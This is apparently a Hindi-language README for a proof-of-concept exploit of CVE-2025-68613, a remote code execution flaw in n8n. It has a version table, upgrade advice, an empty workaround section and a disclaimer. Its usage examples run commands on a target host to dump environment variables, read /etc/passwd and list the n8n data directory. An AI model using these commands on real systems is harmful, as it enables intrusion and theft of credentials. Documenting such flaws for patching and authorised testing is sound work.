
CVE-2025-68613 — n8n RCE एक्सप्रेशन इंजेक्शन के माध्यम से
केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।
n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म में गंभीर RCE भेद्यता (CVSS 9.9)। प्रमाणित उपयोगकर्ता executeCommand नोड के माध्यम से मनमाने OS कमांड निष्पादित कर सकते हैं, सैंडबॉक्स प्रतिबंधों को बायपास करते हुए।
| क्षेत्र | विवरण |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (गंभीर) |
| प्रभावित संस्करण | >= 0.211.0 < 1.120.4 |
| प्रमाणीकरण आवश्यक | हाँ (वर्कफ़्लो निर्माण अनुमतियों वाला कोई भी उपयोगकर्ता) |
| परीक्षण किया गया | n8n 1.119.1 |
| समाधान किया गया | 1.120.4, 1.121.1, 1.122.0 |
n8n वर्कफ़्लो नोड पैरामीटर को सर्वर साइड पर मूल्यांकित करता है। executeCommand नोड n8n प्रक्रिया के विशेषाधिकारों के साथ सीधे होस्ट पर शेल कमांड चलाता है। वर्कफ़्लो निर्माण या संपादन अनुमतियों वाला कोई भी प्रमाणित उपयोगकर्ता पूर्ण RCE प्राप्त करने के लिए इसका दुरुपयोग कर सकता है।
bash poc_final.sh <target> <email> <password> <command>
उदाहरण:
# बुनियादी RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# पर्यावरण चर पढ़ें (इसमें क्रेडेंशियल/API कुंजियाँ हो सकती हैं)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# संवेदनशील फ़ाइलें पढ़ें
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# n8n डेटा निर्देशिका सूचीबद्ध करें
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
नोट: यदि आपके पासवर्ड में
!जैसे विशेष वर्ण हैं, तो एकल उद्धरण का उपयोग करें।
तुरंत n8n >= 1.120.4 में अपग्रेड करें।
यदि तुरंत अपग्रेड करना संभव नहीं है:
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।